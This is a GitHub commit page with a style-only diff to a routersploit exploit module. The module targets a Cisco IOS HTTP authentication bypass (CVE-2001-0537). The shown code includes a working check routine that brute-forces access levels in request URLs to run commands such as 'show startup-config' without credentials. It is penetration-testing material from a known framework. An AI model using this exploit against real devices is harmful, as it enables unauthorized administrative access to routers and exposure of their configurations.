PEP 8

PEP 8

PEP 8
097491e4 · Renos Stoikos · GitHub · da066d62 · 097491e4
Commit 097491e4 authored Apr 18, 2017 by Renos Stoikos Committed by GitHub Apr 18, 2017
Hide whitespace changes
Inline Side-by-side

Showing with 10 additions and 10 deletions

cisco_ios_http_authorization_bypass.py ...les/exploits/cisco/cisco_ios_http_authorization_bypass.py +10 -10

No files found.
--- a/routersploit/modules/exploits/cisco/cisco_ios_http_authorization_bypass.py
+++ b/routersploit/modules/exploits/cisco/cisco_ios_http_authorization_bypass.py
@@ -15,16 +15,16 @@ class Exploit(exploits.Exploit):
    """
    This exploit targets a vulnerability in the Cisco IOS HTTP Server.
    By sending a GET request for the url  "http://ip_address/level/{num}/exec/..",
-    it is possible to bypass authentication and execute any command. 
-    Example: http://10.0.0.1/level/99/exec/show/startup/config  
+    it is possible to bypass authentication and execute any command.
+    Example: http://10.0.0.1/level/99/exec/show/startup/config
    """
    __info__ = {
        'name': 'Cisco IOS HTTP Unauthorized Administrative Access',
        'description': 'HTTP server for Cisco IOS 11.3 to 12.2 allows attackers '
-                        'to bypass authentication and execute arbitrary commands, '
-                        'when local authorization is being used, by specifying a high access level in the URL.',
+                       'to bypass authentication and execute arbitrary commands, '
+                       'when local authorization is being used, by specifying a high access level in the URL.',
        'authors': [
-            'Author', 'renos stoikos <rstoikos[at]gmail.com>'# routesploit module
+            'Author', 'renos stoikos <rstoikos[at]gmail.com>'#  routesploit module
        ],
        'references': [
            'http://www.cvedetails.com/cve/cve-2001-0537',
@@ -34,21 +34,21 @@ class Exploit(exploits.Exploit):
        ],
    }

-    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
-    port = exploits.Option(80, 'Target port') # default port
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) #  target address
+    port = exploits.Option(80, 'Target port') #  default port
    show_command = exploits.Option('show startup-config', 'Command to be executed e.g show startup-config')
    access_level = None
-    
+
    @mute
    def check(self):
        for num in range(16, 100):
            url = "{}:{}/level/{}/exec/-/{}".format(self.target, self.port, num, self.show_command)
            response = http_request(method="GET", url=url)
            if response.status_code == 200:
-            	self.access_level = num
+                self.access_level = num
                return True  # target is vulnerable
        return False  # target is not vulnerable
-            
+
    def run(self):
        if self.check():
            print_success("Target is vulnerable")